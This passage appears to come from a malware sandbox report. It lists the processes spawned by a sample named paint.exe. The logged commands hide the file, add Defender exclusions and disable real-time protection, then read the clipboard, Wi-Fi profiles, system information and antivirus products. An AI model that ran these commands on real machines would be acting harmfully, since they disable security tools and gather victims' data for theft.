                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe""
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                              Start time:04:16:06
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                              Start time:04:16:06
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"
                                                                                                                                                                                                                                                              Imagebase:0x7ff60ec10000
                                                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                              Start time:04:16:06
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:attrib +h +s "C:\Users\user\Desktop\paint.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff6241e0000
                                                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                              Start time:04:16:06
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                              Start time:04:16:06
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:04:16:07
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                              Start time:04:16:07
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:04:16:07
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:04:16:07
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:04:16:07
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                              Imagebase:0x7ff630ed0000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                              Start time:04:16:07
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                              Imagebase:0x7ff630ed0000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                              Start time:04:16:08
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                              Start time:04:16:08
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                              Start time:04:16:08
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                              Start time:04:16:08
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                              Start time:04:16:08
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                              Start time:04:16:08
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                                                                              Imagebase:0x7ff61e760000
                                                                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                                              Imagebase:0x7ff67e070000
                                                                                                                                                                                                                                                              File size:77'312 bytes
                                                                                                                                                                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
